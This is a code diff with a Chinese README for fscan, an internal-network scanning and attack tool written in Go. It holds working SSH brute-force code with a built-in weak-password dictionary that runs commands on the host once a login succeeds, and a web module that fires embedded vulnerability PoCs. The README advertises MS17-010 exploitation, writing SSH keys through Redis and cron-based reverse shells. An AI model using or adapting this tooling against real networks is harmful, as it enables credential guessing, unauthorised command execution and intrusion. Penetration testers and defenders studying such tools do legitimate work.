-func SshScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
-	//SshConn(info,"oracle","oracle",ch,wg)
+
+func SshScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
 Loop:
-	for _,user:=range common.Userdict["ssh"]{
-		for _,pass:=range common.Passwords{
-			pass = strings.Replace(pass, "{user}", string(user), -1)
-			//wg.Add(1)
-			//var good bool
-			//go SshConn(info,user,pass,ch,wg)
-			//if good == true{
-			//	break Loop
-			//}
-			flag,err := SshConn(info,user,pass,ch,wg)
-			if flag==true && err==nil {
+	for _, user := range common.Userdict["ssh"] {
+		for _, pass := range common.Passwords {
+			pass = strings.Replace(pass, "{user}", user, -1)
+			flag, err := SshConn(info, user, pass)
+			if flag == true && err == nil {
 				break Loop
 			}
 		}
 	}
 	wg.Done()
-	<- ch
+	<-ch
 }
 
-func SshConn(info *common.HostInfo,user string,pass string,ch chan int,wg *sync.WaitGroup)(flag bool,err error){
+func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
 	flag = false
-	Host,Port,Username,Password := info.Host, common.PORTList["ssh"],user, pass
-	//fmt.Println(Host,Port,Username,Password)
+	Host, Port, Username, Password := info.Host, common.PORTList["ssh"], user, pass
 	config := &ssh.ClientConfig{
 		User: Username,
 		Auth: []ssh.AuthMethod{
 			ssh.Password(Password),
 		},
-		Timeout: time.Duration(info.Timeout)*time.Second,
+		Timeout: time.Duration(info.Timeout) * time.Second,
 		HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error {
 			return nil
 		},
@@ -50,19 +43,19 @@ func SshConn(info *common.HostInfo,user string,pass string,ch chan int,wg *sync.
 	if err == nil {
 		defer client.Close()
 		session, err := client.NewSession()
-		if err == nil  { //if err == nil && errRet == nil {
+		if err == nil {
 			defer session.Close()
 			flag = true
-			if info.Command != ""{
-				combo,_ := session.CombinedOutput(info.Command)
-				result := fmt.Sprintf("SSH:%v:%v:%v %v \n %v",Host,Port,Username,Password,string(combo))
+			if info.Command != "" {
+				combo, _ := session.CombinedOutput(info.Command)
+				result := fmt.Sprintf("SSH:%v:%v:%v %v \n %v", Host, Port, Username, Password, string(combo))
 				common.LogSuccess(result)
-			}else {
-				result := fmt.Sprintf("SSH:%v:%v:%v %v",Host,Port,Username,Password)
+			} else {
+				result := fmt.Sprintf("[+] SSH:%v:%v:%v %v", Host, Port, Username, Password)
 				common.LogSuccess(result)
 			}
 		}
 	}
-	return flag,err
+	return flag, err
 
 }

Plugins/webtitle.go

@@ -1,84 +1,68 @@
 package Plugins
 
 import (
-	"../common"
+	"crypto/tls"
 	"fmt"
+	"github.com/shadow1ng/fscan/WebScan"
+	"github.com/shadow1ng/fscan/common"
 	"io/ioutil"
 	"net/http"
 	"regexp"
-	"strings"
 	"sync"
 	"time"
 )
 
-func WebTitle(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) (err error, result string) {
-	err,result = geturl(info)
-    wg.Done()
+func WebTitle(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) (err error, result string) {
+	info.Url = fmt.Sprintf("http://%s:%s", info.Host, info.Ports)
+	err, result = geturl(info)
+	if err == nil && info.IsWebCan == false {
+		WebScan.WebScan(info)
+	}
+
+	info.Url = fmt.Sprintf("https://%s:%s", info.Host, info.Ports)
+	err, result = geturl(info)
+	if err == nil && info.IsWebCan == false {
+		WebScan.WebScan(info)
+	}
+
+	wg.Done()
 	<-ch
 	return err, result
 }
 
-
 func geturl(info *common.HostInfo) (err error, result string) {
 	url := info.Url
-	var client = &http.Client{Timeout:time.Duration(info.Timeout)*time.Second }
-	res,err:=http.NewRequest("GET",url,nil)
-	if err==nil{
-		res.Header.Add("User-agent","Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
-		res.Header.Add("Accept","*/*")
-		res.Header.Add("Accept-Language","zh-CN,zh;q=0.9")
-		res.Header.Add("Accept-Encoding","gzip, deflate")
-		res.Header.Add("Connection","close")
-		resp,err:=client.Do(res)
-		if err==nil{
+	tr := &http.Transport{
+		TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
+	}
+	var client = &http.Client{Timeout: time.Duration(info.WebTimeout) * time.Second, Transport: tr}
+	res, err := http.NewRequest("GET", url, nil)
+	if err == nil {
+		res.Header.Add("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
+		res.Header.Add("Accept", "*/*")
+		res.Header.Add("Accept-Language", "zh-CN,zh;q=0.9")
+		res.Header.Add("Accept-Encoding", "gzip, deflate")
+		res.Header.Add("Connection", "close")
+		resp, err := client.Do(res)
+		if err == nil {
 			defer resp.Body.Close()
 			var title string
 			body, _ := ioutil.ReadAll(resp.Body)
-			re :=regexp.MustCompile("<title>(.*)</title>")
-			find := re.FindAllStringSubmatch(string(body),-1)
-			if len(find) > 1{
+			re := regexp.MustCompile("<title>(.*)</title>")
+			find := re.FindAllStringSubmatch(string(body), -1)
+			if len(find) > 0 {
 				title = find[0][1]
-			}else {
+			} else {
 				title = "None"
 			}
-			if len(title) > 20{
-				title = title[:20]
-			}
-			if resp.StatusCode == 400 &&  string(url[5]) != "https"{
-				info.Url = strings.Replace(url, "http://", "https://", 1)
-				return geturl(info)
-			}else {
-				result = fmt.Sprintf("WebTitle:%v %v %v",url,resp.StatusCode,title)
-				common.LogSuccess(result)
+			if len(title) > 50 {
+				title = title[:50]
 			}
+			result = fmt.Sprintf("WebTitle:%v %v %v", url, resp.StatusCode, title)
+			common.LogSuccess(result)
 			return err, result
 		}
+		return err, ""
 	}
 	return err, ""
-
-	//fmt.Print("\n")
 }
-//var client = &http.Client{
-//	Transport:&http.Transport{
-//		DialContext:(&net.Dialer{
-//			Timeout:time.Duration(info.Timeout)*time.Second,
-//		}).DialContext,
-//	},
-//	CheckRedirect:func(req *http.Request, via []*http.Request) error{
-//		return http.ErrUseLastResponse
-//	},
-//}
-
-//if info.Cookie!=""{
-//	res.Header.Add("Cookie",info.Cookie)
-//}
-//if info.Header!=""{
-//	var header = make(map[string]string)
-//	err:=json.Unmarshal([]byte(info.Header),&header)
-//	if err!=nil{
-//		Misc.CheckErr(err)
-//	}
-//	for k,v:=range header{
-//		res.Header.Add(k,v)
-//	}
-//}

README.md

@@ -1,8 +1,8 @@
 # fscan
 
 # 简介
-一款内网扫描工具，方便一键大保健。  
-支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写私钥、计划任务反弹shell、读取win网卡信息等。  
+一款内网扫描工具，方便一键大保健。    
+支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写私钥、计划任务反弹shell、读取win网卡信息、web漏洞扫描等。  
 趁着最近有空，用go把f-scrack重构了一遍。使用go来编写，也有更好的扩展性及兼容性。  
 还在逐步增加功能，欢迎各位师傅提意见。
 
@@ -13,6 +13,14 @@
 答：  
    因为用习惯了f-scrack，习惯一条命令跑完所有模块，省去一个个模块单独调用的时间，当然我附加了-m 指定模块的功能。
 
+## 最近更新
+[+] 2020/12/12 已加入yaml解析引擎,支持xray的Poc,默认使用所有Poc(已对xray的poc进行了筛选),可以使用-pocname weblogic,只使用某种或某个poc。需要go版本1.16以上,只能自行编译最新版go来进行测试    
+[+] 2020/12/6 优化icmp模块,新增-domain 参数(用于smb爆破模块,适用于域用户)  
+[+] 2020/12/03 优化ip段处理模块、icmp、端口扫描模块。新增支持192.168.1.1-192.168.255.255。  
+[+] 2020/11/17 增加-ping 参数,作用是存活探测模块用ping代替icmp发包。   
+[+] 2020/11/17 增加WebScan模块,新增shiro简单识别。https访问时,跳过证书认证。将服务模块和web模块的超时分开,增加-wt 参数(WebTimeout)。    
+[+] 2020/11/16 对icmp模块进行优化,增加-it 参数(IcmpThreads),默认11000,适合扫B段  
+[+] 2020/11/15 支持ip以文件导入,-hs ip.txt,并对去重做了处理
 
 ## usege
 简单用法
@@ -25,23 +33,46 @@ fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后，命令执行)
 fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
 fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
 ```
+```
+-h 192.168.1.1/24 (C段)  
+-h 192.168.1.1/16 (B段)
+-h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
+-hf ip.txt  (以文件导入)
+```
+
 
 完整参数
 ```
+  -Num int
+        poc rate (default 20)
   -c string
         exec command (ssh)
+  -domain string
+        smb domain
   -h string
         IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
+  -hf string
+        host file, -hs ip.txt
+  -it int
+        Icmp Threads nums (default 11000)
   -m string
         Select scan type ,as: -m ssh (default "all")
   -no
         not to save output log
+  -nopoc
+        not to scan web vul
   -np
         not to ping
   -o string
         Outputfile (default "result.txt")
   -p string
-        Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,23,80,135,443,445,1433,1521,3306,5432,6379,7001,8080,8089,9000,9200,11211,27017")
+        Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,11211,27017")
+  -ping
+        using ping replace icmp
+  -pocname string
+        use the pocs these contain pocname, -pocname weblogic
+  -proxy string
+        set poc proxy, -proxy http://127.0.0.1:8080
   -pwd string
         password
   -pwdf string
@@ -51,33 +82,44 @@ fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
   -rs string
         redis shell to write cron file (as: -rs 192.168.1.1:6666)
   -t int
-        Thread nums (default 100)
+        Thread nums (default 200)
   -time int
         Set timeout (default 3)
   -user string
         username
   -userf string
         username file
+  -wt int
+        Set web timeout (default 3)
+
 ```
 
+## 运行截图
 
-`fscan.exe -h 192.168.x.x`
+`fscan.exe -h 192.168.x.x  (全功能、ms17010、读取网卡信息)`
 ![](image/1.png)
 
+![](image/4.png)
+
 `fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写私钥)`
 ![](image/2.png)
 
-
 `fscan.exe -h 192.168.x.x -c "whoami;id" (ssh 命令)`
 ![](image/3.png)
 
+`fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 一键支持xray的poc`
+![](image/2020-12-12-13-34-44.png)
 
-`fscan.exe -h 192.168.x.x (ms17010、读取网卡信息)`
-![](image/4.png)
+## 未来计划
+[*] 合理输出当前扫描进度  
+[*] 增加内网常见高危漏洞  
+[*] 增加高危web漏洞扫描  
+[*] 师傅们觉得有必要加的漏洞，也可以提issue  
 
 
 ## 参考链接
 https://github.com/Adminisme/ServerScan  
 https://github.com/netxfly/x-crack  
 https://github.com/hack2fun/Gscan  
-https://github.com/k8gege/LadonGo   
+https://github.com/k8gege/LadonGo   
+https://github.com/jjf012/gopoc

WebScan/WebScan.go

@@ -0,0 +1,42 @@
+package WebScan
+
+import (
+	"embed"
+	"github.com/shadow1ng/fscan/WebScan/lib"
+	"github.com/shadow1ng/fscan/common"
+	"net/http"
+	"time"
+)
+
+//go:embed pocs
+var Pocs embed.FS
+
+func WebScan(info *common.HostInfo) {
+	info.PocInfo.Target = info.Url
+	Execute(info.PocInfo)
+}
+
+func Execute(PocInfo common.PocInfo) error {
+	//PocInfo.Proxy = "http://127.0.0.1:8080"
+	err := lib.InitHttpClient(PocInfo.Num, PocInfo.Proxy, time.Duration(PocInfo.Timeout)*time.Second)
+	if err != nil {
+		return err
+	}
+	req, err := http.NewRequest("GET", PocInfo.Target, nil)
+	req.Header.Set("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
+	if err != nil {
+		return err
+	}
+	if PocInfo.Cookie != "" {
+		req.Header.Set("Cookie", PocInfo.Cookie)
+	}
+
+	//PocInfo.PocName = "weblogic-cve-2017-10271.yml"
+	if PocInfo.PocName != "" {
+		lib.CheckMultiPoc(req, Pocs, PocInfo.Num, PocInfo.PocName)
+	} else {
+		lib.CheckMultiPoc(req, Pocs, PocInfo.Num, "")
+	}
+
+	return nil
+}

common/Parse.go

@@ -74,7 +74,7 @@ func Readfile(filename string)([]string,error){
 	file, err := os.Open(filename)
 	if err!=nil{
 		fmt.Println("Open %s error, %v", filename,err)
-		return nil,err
+		os.Exit(0)
 	}
 	defer file.Close()
 	var content []string
@@ -92,7 +92,7 @@ func Readfile(filename string)([]string,error){
 
 
 func ParseInput(Info *HostInfo){
-	if Info.Host==""{
+	if Info.Host=="" && Info.HostFile ==""{
 		fmt.Println("Host is none")
 		flag.Usage()
 		os.Exit(0)
@@ -123,4 +123,12 @@ func ParseScantype(Info *HostInfo){
 			PORTList[name] = ScanPort
 		}
 	}
+}
+
+
+func CheckErr(text string,err error){
+	if err!=nil{
+		fmt.Println(text,err.Error())
+		os.Exit(0)
+	}
 }

common/ParseIP.go

@@ -1,131 +1,225 @@
 package common
 
 import (
+	"bufio"
 	"errors"
+	"fmt"
 	"net"
+	"os"
 	"regexp"
 	"strconv"
 	"strings"
 )
 
-var ParseIPErr error =errors.New("host parsing error\n" +
-	"format: \n"+
-	"192.168.1.1/24\n"+
+var ParseIPErr = errors.New(" host parsing error\n" +
+	"format: \n" +
 	"192.168.1.1\n" +
+	"192.168.1.1/8\n" +
+	"192.168.1.1/16\n" +
+	"192.168.1.1/24\n" +
 	"192.168.1.1,192.168.1.2\n" +
+	"192.168.1.1-192.168.255.255\n" +
 	"192.168.1.1-255")
 
-func ParseIP(ip string)([]string,error){
-	reg:=regexp.MustCompile(`[a-zA-Z]+`)
+func ParseIP(ip string, filename string) (hosts []string, err error) {
+
+	if ip != "" {
+		hosts, err = ParseIPs(ip)
+	}
+	if filename != "" {
+		var filehost []string
+		filehost, _ = Readipfile(filename)
+		hosts = append(hosts, filehost...)
+	}
+	hosts = RemoveDuplicate(hosts)
+	return hosts, err
+}
+
+func ParseIPs(ip string) (hosts []string, err error) {
+	if strings.Contains(ip, ",") {
+		IPList := strings.Split(ip, ",")
+		var ips []string
+		for _, ip := range IPList {
+			ips, err = ParseIPone(ip)
+			CheckErr(ip, err)
+			hosts = append(hosts, ips...)
+		}
+		return hosts, err
+	} else {
+		hosts, err = ParseIPone(ip)
+		CheckErr(ip, err)
+		return hosts, err
+	}
+}
+
+func ParseIPone(ip string) ([]string, error) {
+	reg := regexp.MustCompile(`[a-zA-Z]+`)
 	switch {
-	case strings.Contains(ip[len(ip)-3:len(ip)],"/24"):
+	case strings.Contains(ip[len(ip)-3:len(ip)], "/24"):
 		return ParseIPA(ip)
-	case strings.Contains(ip[len(ip)-3:len(ip)],"/16"):
+	case strings.Contains(ip[len(ip)-3:len(ip)], "/16"):
 		return ParseIPD(ip)
-	case strings.Contains(ip[len(ip)-2:len(ip)],"/8"):
+	case strings.Contains(ip[len(ip)-2:len(ip)], "/8"):
 		return ParseIPE(ip)
-	case strings.Contains(ip,","):
-		return ParseIPB(ip)
-	case strings.Count(ip,"-")==1:
+	case strings.Count(ip, "-") == 1:
 		return ParseIPC(ip)
 	case reg.MatchString(ip):
 		_, err := net.LookupHost(ip)
 		if err != nil {
-			return nil,err
+			return nil, err
 		}
-		return []string{ip},nil
+		return []string{ip}, nil
 	default:
-		testIP:=net.ParseIP(ip)
-		if testIP==nil{
-			return nil,ParseIPErr
+		testIP := net.ParseIP(ip)
+		if testIP == nil {
+			return nil, ParseIPErr
 		}
-		return []string{ip},nil
+		return []string{ip}, nil
 	}
 }
 
 //Parsing CIDR IP
-func ParseIPA(ip string)([]string,error){
-	realIP:=ip[:len(ip)-3]
-	testIP:=net.ParseIP(realIP)
+func ParseIPA(ip string) ([]string, error) {
+	realIP := ip[:len(ip)-3]
+	testIP := net.ParseIP(realIP)
 
-	if testIP==nil{
-		return nil,ParseIPErr
+	if testIP == nil {
+		return nil, ParseIPErr
 	}
-	IPrange:=strings.Join(strings.Split(realIP,".")[0:3],".")
+	IPrange := strings.Join(strings.Split(realIP, ".")[0:3], ".")
 	var AllIP []string
-	for i:=0;i<=255;i++{
-		AllIP=append(AllIP,IPrange+"."+strconv.Itoa(i))
+	for i := 0; i <= 255; i++ {
+		AllIP = append(AllIP, IPrange+"."+strconv.Itoa(i))
 	}
-	return AllIP,nil
+	return AllIP, nil
 }
 
 //Resolving multiple IPS, for example: 192.168.111.1,192.168.111.2
-func ParseIPB(ip string)([]string,error){
-	IPList:=strings.Split(ip,",")
-	for _,i:=range IPList{
-		testIP:=net.ParseIP(i)
-		if testIP==nil{
-			return nil,ParseIPErr
+func ParseIPB(ip string) ([]string, error) {
+	IPList := strings.Split(ip, ",")
+	for _, i := range IPList {
+		testIP := net.ParseIP(i)
+		if testIP == nil {
+			return nil, ParseIPErr
 		}
 	}
-	return IPList,nil
+	return IPList, nil
 
 }
 
-//Resolving a range of IP,for example: 192.168.111.1-255
-func ParseIPC(ip string)([]string,error){
-	IPRange:=strings.Split(ip,"-")
-	testIP:=net.ParseIP(IPRange[0])
-	Range,err:=strconv.Atoi(IPRange[1])
-	if testIP==nil || Range>255 || err!=nil{
-		return nil,ParseIPErr
-	}
-	SplitIP:=strings.Split(IPRange[0],".")
-	ip1,err1:=strconv.Atoi(SplitIP[3])
-	ip2,err2:=strconv.Atoi(IPRange[1])
-	PrefixIP:=strings.Join(SplitIP[0:3],".")
+//Resolving a range of IP,for example: 192.168.111.1-255,192.168.111.1-192.168.112.255
+func ParseIPC(ip string) ([]string, error) {
+	IPRange := strings.Split(ip, "-")
+	testIP := net.ParseIP(IPRange[0])
 	var AllIP []string
-	if ip1>ip2 || err1!=nil || err2!=nil{
-		return nil,ParseIPErr
+	if len(IPRange[1]) < 4 {
+		Range, err := strconv.Atoi(IPRange[1])
+		if testIP == nil || Range > 255 || err != nil {
+			return nil, ParseIPErr
+		}
+		SplitIP := strings.Split(IPRange[0], ".")
+		ip1, err1 := strconv.Atoi(SplitIP[3])
+		ip2, err2 := strconv.Atoi(IPRange[1])
+		PrefixIP := strings.Join(SplitIP[0:3], ".")
+		if ip1 > ip2 || err1 != nil || err2 != nil {
+			return nil, ParseIPErr
+		}
+		for i := ip1; i <= ip2; i++ {
+			AllIP = append(AllIP, PrefixIP+"."+strconv.Itoa(i))
+		}
+	} else {
+		SplitIP1 := strings.Split(IPRange[0], ".")
+		SplitIP2 := strings.Split(IPRange[1], ".")
+		fmt.Println(SplitIP1, SplitIP2, len(SplitIP1), len(SplitIP2))
+		if len(SplitIP1) != 4 || len(SplitIP2) != 4 {
+			return nil, ParseIPErr
+		}
+		start, end := [4]int{}, [4]int{}
+		for i := 0; i < 4; i++ {
+			ip1, err1 := strconv.Atoi(SplitIP1[i])
+			ip2, err2 := strconv.Atoi(SplitIP2[i])
+			if ip1 > ip2 || err1 != nil || err2 != nil {
+				return nil, ParseIPErr
+			}
+			start[i], end[i] = ip1, ip2
+		}
+		startNum := (start[0]<<24 | start[1]<<16 | start[2]<<8 | start[3])
+		endNum := (end[0]<<24 | end[1]<<16 | end[2]<<8 | end[3])
+		fmt.Println(startNum, endNum)
+		for num := startNum; num < endNum; num++ {
+			ip := (strconv.Itoa((num>>24)&0xff) + "." + strconv.Itoa((num>>16)&0xff) + "." + strconv.Itoa((num>>8)&0xff) + "." + strconv.Itoa((num)&0xff))
+			AllIP = append(AllIP, ip)
+		}
 	}
-	for i:=ip1;i<=ip2;i++{
-		AllIP=append(AllIP,PrefixIP+"."+strconv.Itoa(i))
-	}
-	return AllIP,nil
+
+	return AllIP, nil
 
 }
 
-func ParseIPD(ip string)([]string,error){
-	realIP:=ip[:len(ip)-3]
-	testIP:=net.ParseIP(realIP)
+func ParseIPD(ip string) ([]string, error) {
+	realIP := ip[:len(ip)-3]
+	testIP := net.ParseIP(realIP)
 
-	if testIP==nil{
-		return nil,ParseIPErr
+	if testIP == nil {
+		return nil, ParseIPErr
 	}
-	IPrange:=strings.Join(strings.Split(realIP,".")[0:2],".")
+	IPrange := strings.Join(strings.Split(realIP, ".")[0:2], ".")
 	var AllIP []string
-	for a:=0;a<=255;a++{
-		for b:=0;b<=255;b++{
-			AllIP=append(AllIP,IPrange+"."+strconv.Itoa(a)+"."+strconv.Itoa(b))
+	for a := 0; a <= 255; a++ {
+		for b := 0; b <= 255; b++ {
+			AllIP = append(AllIP, IPrange+"."+strconv.Itoa(a)+"."+strconv.Itoa(b))
 		}
 	}
-	return AllIP,nil
+	return AllIP, nil
 }
 
-func ParseIPE(ip string)([]string,error){
-	realIP:=ip[:len(ip)-2]
-	testIP:=net.ParseIP(realIP)
+func ParseIPE(ip string) ([]string, error) {
+	realIP := ip[:len(ip)-2]
+	testIP := net.ParseIP(realIP)
 
-	if testIP==nil{
-		return nil,ParseIPErr
+	if testIP == nil {
+		return nil, ParseIPErr
 	}
-	IPrange:=strings.Join(strings.Split(realIP,".")[0:1],".")
+	IPrange := strings.Join(strings.Split(realIP, ".")[0:1], ".")
 	var AllIP []string
-	for a:=0;a<=255;a++{
-		for b:=0;b<=255;b++{
-			AllIP=append(AllIP,IPrange+"."+strconv.Itoa(a)+"."+strconv.Itoa(b)+"."+strconv.Itoa(1))
-			AllIP=append(AllIP,IPrange+"."+strconv.Itoa(a)+"."+strconv.Itoa(b)+"."+strconv.Itoa(254))
+	for a := 0; a <= 255; a++ {
+		for b := 0; b <= 255; b++ {
+			AllIP = append(AllIP, IPrange+"."+strconv.Itoa(a)+"."+strconv.Itoa(b)+"."+strconv.Itoa(1))
+			AllIP = append(AllIP, IPrange+"."+strconv.Itoa(a)+"."+strconv.Itoa(b)+"."+strconv.Itoa(254))
 		}
 	}
-	return AllIP,nil
-}
+	return AllIP, nil
+}
+
+func Readipfile(filename string) ([]string, error) {
+	file, err := os.Open(filename)
+	if err != nil {
+		fmt.Println("Open %s error, %v", filename, err)
+		os.Exit(0)
+	}
+	defer file.Close()
+	var content []string
+	scanner := bufio.NewScanner(file)
+	scanner.Split(bufio.ScanLines)
+	for scanner.Scan() {
+		text := strings.TrimSpace(scanner.Text())
+		if text != "" {
+			host, err := ParseIPs(text)
+			CheckErr(text, err)
+			content = append(content, host...)
+		}
+	}
+	return content, nil
+}
+
+func RemoveDuplicate(old []string) []string {
+	result := make([]string, 0, len(old))
+	temp := map[string]struct{}{}
+	for _, item := range old {
+		if _, ok := temp[item]; !ok {
+			temp[item] = struct{}{}
+			result = append(result, item)
+		}
+	}
+	return result
+}

common/config.go

@@ -1,107 +1,100 @@
 package common
 
+//fscan version 1.3
 var Userdict = map[string][]string{
-	"ftp":  {"www","admin","root","db","wwwroot","data","web","ftp"},
-	"mysql": {"root"},
-	"mssql": {"root","sa"},
-	"smb": {"administrator","guest"},
-	"postgresql": {"postgres","admin"},
-	"ssh": {"root","admin"},
-	"mongodb": {"root","admin"},
+	"ftp":        {"www", "admin", "root", "db", "wwwroot", "data", "web", "ftp"},
+	"mysql":      {"root"},
+	"mssql":      {"root", "sa"},
+	"smb":        {"administrator", "guest"},
+	"postgresql": {"postgres", "admin"},
+	"ssh":        {"root", "admin"},
+	"mongodb":    {"root", "admin"},
 	//"telnet": []string{"administrator","admin","root","cisco","huawei","zte"},
 }
 
-var Passwords = []string{"admin123A","admin123","123456","admin","root","password","123123","654321","123","1","admin@123","Admin@123","{user}","{user}123","","P@ssw0rd!","qwa123","12345678","test","123qwe!@#","123456789","123321","666666","fuckyou","000000","1234567890","8888888","qwerty","1qaz2wsx","abc123","abc123456","1qaz@WSX","Aa123456","sysadmin","system","huawei"}
+var Passwords = []string{"admin123A", "admin123", "123456", "admin", "root", "password", "123123", "654321", "123", "1", "admin@123", "Admin@123", "{user}", "{user}123", "", "P@ssw0rd!", "qwa123", "12345678", "test", "123qwe!@#", "123456789", "123321", "666666", "fuckyou", "000000", "1234567890", "8888888", "qwerty", "1qaz2wsx", "abc123", "abc123456", "1qaz@WSX", "Aa123456", "sysadmin", "system", "huawei"}
 
 var PORTList = map[string]int{
-	"ftp": 21,
-	"ssh": 22,
-	"mem": 11211,
-	"mgo": 27017,
-	"mssql": 1433,
-	"psql": 5432,
-	"redis": 6379,
-	"mysql": 3306,
-	"smb": 445,
-	"ms17010": 1000001,
-	"cve20200796":1000002,
-	"elastic": 9200,
-	"findnet": 135,
-	"all":0,
-	//"wenscan": 17010,
+	"ftp":         21,
+	"ssh":         22,
+	"mem":         11211,
+	"mgo":         27017,
+	"mssql":       1433,
+	"psql":        5432,
+	"redis":       6379,
+	"mysql":       3306,
+	"smb":         445,
+	"ms17010":     1000001,
+	"cve20200796": 1000002,
+	"webtitle":    1000003,
+	"elastic":     9200,
+	"findnet":     135,
+	"all":         0,
+}
+
+var PORTList_bak = map[string]int{
+	"ftp":         21,
+	"ssh":         22,
+	"mem":         11211,
+	"mgo":         27017,
+	"mssql":       1433,
+	"psql":        5432,
+	"redis":       6379,
+	"mysql":       3306,
+	"smb":         445,
+	"ms17010":     1000001,
+	"cve20200796": 1000002,
+	"webtitle":    1000003,
+	"elastic":     9200,
+	"findnet":     135,
+	"all":         0,
 }
 
 var Outputfile = "result.txt"
 var IsSave = true
 
-var DefaultPorts = "21,22,23,80,135,443,445,1433,1521,3306,5432,6379,7001,8080,8089,9000,9200,11211,27017"
-
+var DefaultPorts = "21,22,80,81,135,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,11211,27017"
 
 type HostInfo struct {
-	Host string
-	Ports string
-	Url string
-	Timeout int64
-	Scantype string
-	Isping bool
-	Threads int
-	Command string
-	Username string
-	Password string
-	Userfile string
-	Passfile string
-	Usernames []string
-	Passwords []string
-	Outputfile string
-	IsSave bool
-	RedisFile string
-	RedisShell string
+	Host        string
+	HostFile    string
+	Ports       string
+	Domain      string
+	Url         string
+	Timeout     int64
+	WebTimeout  int64
+	Scantype    string
+	Ping        bool
+	Isping      bool
+	Threads     int
+	IcmpThreads int
+	Command     string
+	Username    string
+	Password    string
+	Userfile    string
+	Passfile    string
+	Usernames   []string
+	Passwords   []string
+	Outputfile  string
+	IsSave      bool
+	RedisFile   string
+	RedisShell  string
+	IsWebCan    bool
+	PocInfo     PocInfo
 }
 
-
-
-
-
-//var Passwords = []string{"admin123A","123456","admin","root","password","123123","123","1","{user}","{user}{user}","{user}1","{user}123","{user}2016","{user}2015","{user}!","","P@ssw0rd!!","qwa123","12345678","test","123qwe!@#","123456789","123321","1314520","666666","woaini","fuckyou","000000","1234567890","8888888","qwerty","1qaz2wsx","abc123","abc123456","1q2w3e4r","123qwe","p@ssw0rd","p@55w0rd","password!","p@ssw0rd!","password1","r00t","tomcat","apache","system","huawei","admin123","zte"}
-//const Username = "admin"
-//const Password = "123456"
-//const Timeout = 3 * time.Second
-//const FTPPORT = 21
-//const SSHPORT = 22
-//const MEMCACHEDPORT = 11211
-//const MONGODBPORT  = 27017
-//const MSSQLPORT = 1433
-//const OraclePORT = 1433
-//const PSQLPORT = 5432
-//const REDISPORT = 6379
-//const MYSQLPORT  = 3306
-//const SMBPORT = 445
-//const POSTGRESPORT = 5432
-
-//var Userdict = map[string][]string{
-//	"ftp":  []string{"www","admin","root","db","wwwroot","data","web","ftp"},
-//	"mysql": []string{"root"},
-//	"mssql": []string{"root","sa"},
-//	"smb": []string{"administrator","guest"},
-//	"postgresql": []string{"postgres","admin"},
-//	"ssh": []string{"root","admin"},
-//	"mongodb": []string{"root","admin"},
-//	//"telnet": []string{"administrator","admin","root","cisco","huawei","zte"},
-//}
-
-//var PluginList = map[string]interface{}{
-//	"ftp": FtpScan,
-//	"mysql": MysqlScan,
-//	//"mongodb":MgoConn,
-//	"mssql":MssqlScan,
-//	"redis": RedisScan,
-//	//"smb": SmbScan,
-//	"ssh": SshScan,
-//	//"portscan": PortConn,
-//	//"icmp": IcmpConn,
-//	"postgresql": PostgresScan,
-//	//"urlscan":UrlConn,
-//	//"auth":ApacheConn,
-//	//"subdomain":SDConn,
-//	//"memcached":MemConn,
-//}
+type PocInfo struct {
+	Num        int
+	Rate       int
+	Timeout    int64
+	Proxy      string
+	PocName    string
+	PocDir     string
+	Target     string
+	TargetFile string
+	RawFile    string
+	Cookie     string
+	ForceSSL   bool
+	ApiKey     string
+	CeyeDomain string
+}

common/flag.go

@@ -4,37 +4,44 @@ import (
 	"flag"
 )
 
-func Banner(){
+func Banner() {
 	banner := `
 
    ___                              _    
   / _ \     ___  ___ _ __ __ _  ___| | __
- / /_\/____/ __|/ __| '__/ _`+"`"+` |/ __| |/ /
+ / /_\/____/ __|/ __| '__/ _` + "`" + ` |/ __| |/ /
 / /_\\_____\__ \ (__| | | (_| | (__|   <
 \____/     |___/\___|_|  \__,_|\___|_|\_\
 `
 	print(banner)
 }
 
-
-
-
-func Flag(Info *HostInfo)  {
+func Flag(Info *HostInfo) {
 	Banner()
-	flag.StringVar(&Info.Host,"h","","IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12")
-	flag.StringVar(&Info.Ports,"p",DefaultPorts,"Select a port,for example: 22 | 1-65535 | 22,80,3306")
-	flag.StringVar(&Info.Command,"c","","exec command (ssh)")
-	flag.IntVar(&Info.Threads,"t",100,"Thread nums")
-	flag.BoolVar(&Info.Isping,"np",false,"not to ping")
-	flag.BoolVar(&Info.IsSave,"no",false,"not to save output log")
-	flag.StringVar(&Info.Username,"user","","username")
-	flag.StringVar(&Info.Userfile,"userf","","username file")
-	flag.StringVar(&Info.Password,"pwd","","password")
-	flag.StringVar(&Info.Passfile,"pwdf","","password file")
-	flag.StringVar(&Info.Outputfile,"o","result.txt","Outputfile")
-	flag.Int64Var(&Info.Timeout,"time",3,"Set timeout")
